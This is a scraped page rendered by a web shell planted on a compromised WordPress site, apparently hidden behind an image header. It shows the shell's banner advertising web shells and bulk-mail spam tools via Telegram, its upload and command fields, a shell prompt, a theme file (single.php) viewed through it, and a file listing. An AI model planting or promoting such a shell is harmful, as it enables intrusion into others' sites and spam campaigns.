����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php
/**
 * The template for displaying all single posts and attachments
 *
 * @package WordPress
 * @subpackage Twenty_Sixteen
 * @since Twenty Sixteen 1.0
 */

get_header(); ?>

<div class="content_wrapper">
<section class="page_container">
<?php
		// Start the loop.
		while ( have_posts() ) :
			the_post();
?>
<?php

$detailpic = get_the_post_thumbnail_url(get_the_ID(),'full'); 
 ?>
	<div class="detail_post_header">
    	<h2><?php the_title(); ?></h2>
    </div>
    <div class="clear"></div>
    
    <div class="detail_post_wrapper">
    	<div class="detail_postleft">
        	<div class="prjbig_pic"><img id="prjbm" src="<?php echo $detailpic?>" alt="<?php the_title(); ?>" /></div>
            <div class="prj_thumbs">
            	<div class="owl-carousel owl-theme" id="pthumbslider">
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
                    <div class="item"><a href=""><img src="<?php echo $detailpic?>" /></a></div>
				</div>
            </div>
        </div>
        <div class="detail_postright">
        	<div class="detail_pr_text">
            	<?php the_content(); ?>
            </div>
        </div>
    </div>
    <div class="clear"></div>
    
    <div class="gallery_tabs">
    	<?php echo get_field('gallery_shortcode'); ?>
        <div class="clear"></div>
    </div>
	<div class="clear"></div>
    
<?php
			// If comments are open or we have at least one comment, load up the comment template.
			if ( comments_open() || get_comments_number() ) {
				comments_template();
			}

			// End of the loop.
		endwhile;
		?>
     
</section>
</div>
<div class="post_pagination">
<?php previous_post_link( '%link', '%title'); ?>
<?php next_post_link( '%link', '%title' ); ?>

</div>

<script>

jQuery(document).ready(function() {
						   
						   
 jQuery('#pthumbslider').owlCarousel({
	margin:5,
	nav: true,
	center : true,
	dots: false,
	items: 5,
	loop: true,
	responsiveClass:true,
    responsive:{
        0:{
            items:2,
        },
        600:{
            items:4,
        },
        1000:{
            items:5,
        }
    }
  })
  
})
</script>

<?php get_footer(); ?>

Filemanager

Name Type Size Permission Actions
animate.css File 73.29 KB 0644
blocks.css File 8.31 KB 0644
editor-blocks.css File 13.46 KB 0644
editor-style.css File 6.49 KB 0644
ie.css File 748 B 0644
ie7.css File 2.5 KB 0644
ie8.css File 3.39 KB 0644
owl.carousel.min.css File 2.87 KB 0644
single.php File 2.79 KB 0644
style.css File 15.51 KB 0644